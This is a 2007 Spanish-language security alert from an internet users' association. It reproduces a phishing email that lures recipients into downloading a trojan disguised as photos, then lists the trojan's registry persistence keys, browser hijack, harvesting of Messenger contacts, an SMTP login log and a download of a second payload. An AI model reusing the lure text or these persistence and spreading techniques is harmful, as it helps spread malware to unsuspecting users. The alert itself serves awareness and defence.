08-06-2007 - Si usted recibe el siguiente correo electrónico o similares, tenga mucho cuidado;
From: "xxxxxxx@hotmail.com"
To:
Subject: Como estas?, tanto tiempo!
Y che como estas!! tanto tiempo!! el otro dia hable con Roberto..dice que ta todo bien..me paso unas fotos del y su mujer...me dijo que te pasara, descargalas de aca: http://XXXXXXX/fotos.zip ..tene cuidado a quien
le mostras he! responde o conectate al MSN algun dia q hace tanto tiempo q no nos juntamos todos los gurises!
Nessun dorma
Si se descarga o dependiendo el navegador que use se auto-descarga y se ejecuta sin el consentimiento del usuario, sepa que es un troyano.
El troyano que se ejecuta es; Fotos roberto.exe de 66,5 KB
Al ejecutarse nos modifica el registro y cambia opciones del navegador:
-Registro de Windows:\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Cambiar svchost C:\WINDOWS\addins\svchost.exe
C:\WINDOWS\system\svchost.exe 08/06/2007 12:57:23
-C:\WINDOWS\system32\wbem\wmiprvse.exe
Registro de Windows:\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ Agregar Upgrade c:\windows\system32\winupgd.exe
-Internet Explorer:\\IESettings (MIMAQUINA) Cambiar Start Page http://prosXXXXXX.com about:blank
Crea un fichero llamado;
mis contactos.txt
Este contiene los contactos de Messenger del usuario infectado, para ser usados en un reenvio.
Manda un correo electrónico y realiza una nueva descarga:
220 smtp-s1.antel.net.uy ESMTP Relay service (7.2.072.1) ready
EHLO MIMAQUINA
250-smtp-s1.antel.net.uy
250-8BITMIME
250-PIPELINING
250-HELP
250-AUTH=LOGIN
250-AUTH LOGIN CRAM-MD5 PLAIN
250-DELIVERBY 300
250 SIZE 30720000
AUTH LOGIN
334 VXNlcm5hbWU6
bWFyY2VkZWXXXXXXXXXXXXXXXXXXmV0LmNvbS51eQ==
334 UGXXXXXQ6
Descarga del nuevo fichero llamado: virus.zip
GET /virus.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: XXXXXX.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Apache/2.0.59 (Unix) PHP/5.2.0
Location: http://XXXXXXX.com/
Content-Length: 219
Connection: close
Content-Type: text/html; charset=iso-8859-1
En realidad este fichero es un ejecutable llamado; virus.exe
En el servidor que contiene el malware se encuentra otros ficheros:
Advertimos que los anti-virus no lo detectan al ser una nueva variante pues tenga mucho cuidado.
Consejos y advertencias:
Si usted recibe un correo de un extraño, un correo no deseado, incluso este tipo de tarjetas les recomendamos la máxima prudencia y si es posible no haga caso de este tipo de correos electrónico y NUNCA pulsar sobre los enlaces que contiene.
Agradecemos a KiKiTo (Pitas Pitas Pitas, por el aviso).
Comisión de Seguridad en la Red.
José María Luque Guerrero
http://seguridad.internautas.org -
www.seguridadenlared.org -
www.seguridadpymes.es
Asociación de Internautas.
www.internautas.org